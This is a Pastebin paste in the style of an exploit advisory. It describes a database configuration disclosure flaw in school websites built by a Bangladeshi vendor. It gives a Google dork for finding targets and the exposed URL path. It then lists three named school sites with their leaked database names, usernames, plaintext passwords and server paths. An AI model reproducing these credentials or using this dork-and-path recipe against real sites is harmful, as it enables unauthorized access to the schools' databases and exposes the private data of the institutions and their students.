Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ######################################################################
- # Exploit Title : Momtaj Trading Pvt Ltd Bangladesh Database Configuration Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 02/05/2019
- # Vendor Homepage : momtajtdpl.com.bd
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type :
- CWE-16 [ Configuration ]
- CWE-200 [ Information Exposure ]
- CWE-538 [ File and Directory Information Exposure ]
- # Google Dorks : intext:Design & Developed By Momtaj Trading(Pvt) Ltd. site:edu.bd
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- #####################################################################
- # Impact :
- ***********
- Momtaj Trading Pvt Ltd Bangladesh configuration file may potentially
- disclose sensitive information to remote attackers.
- The configuration file unintentionally stored in /online/admission/store
- HTTP requests consisting of a single character will cause the software to disclose sensitive
- configuration information, including the password/database to the administrative web interface.
- This file is installed, by default, with world readable and possibly world writeable permissions enabled.
- This may have some potentially serious consequences as the configuration file
- also stores password information in plain text.
- This issue occurs because access controls on configuration files are not properly set.
- An attacker can exploit this issue to retrieve potentially sensitive information.
- Attackers can access config file via URL request. This may aid in further attacks.
- * The product stores sensitive information in files or directories that are accessible to actors
- outside of the intended control sphere.
- * An information exposure is the intentional or unintentional disclosure of information to an actor
- that is not explicitly authorized to have access to that information.
- #####################################################################
- # Database Configuration File Disclosure Exploit :
- *******************************************
- /online/admission/store
- Information :
- *************
- SERVER_ADMIN =>
- Server IP Address =>
- DOCUMENT_ROOT =>
- DB_CONNECTION =>
- DB_HOST =>
- DB_PORT =>
- DB_DATABASE =>
- DB_USERNAME =>
- DB_PASSWORD =>
- #####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] batrishhazarihighschool.edu.bd/online/admission/store
- SERVER_ADMIN => "webmaster@batrishhazarihighschool.asf.com.bd"
- DOCUMENT_ROOT => "/home/yaclf0mv9b7u/public_html/batrishhazarihighschool.edu.bd"
- DB_CONNECTION => "mysql"
- DB_HOST => "localhost"
- DB_PORT => "3306"
- DB_DATABASE => "batrishhazarih"
- DB_USERNAME => "batrishhazarih"
- DB_PASSWORD => "*batrishhazarih123"
- [+] pphs.edu.bd/online/admission/store
- DOCUMENT_ROOT => "/home/yaclf0mv9b7u/pphs.edu.bd"
- SERVER_ADMIN => "webmaster@pphs.asf.com.bd"
- DB_CONNECTION => "mysql"
- DB_HOST => "localhost"
- DB_PORT => "3306"
- DB_DATABASE => "pphs"
- DB_USERNAME => "pphs"
- DB_PASSWORD => "*pphs123"
- [+] jubsreepur.edu.bd/online/admission/store
- DOCUMENT_ROOT => "/home/yaclf0mv9b7u/public_html/jubsreepur.edu.bd"
- SERVER_ADMIN => "webmaster@jubsreepur.asf.com.bd"
- DB_CONNECTION => "mysql"
- DB_HOST => "localhost"
- DB_PORT => "3306"
- DB_DATABASE => "jubsreepur"
- DB_USERNAME => "jubsreepur"
- DB_PASSWORD => "*jubsreepur123"
- #####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- #####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement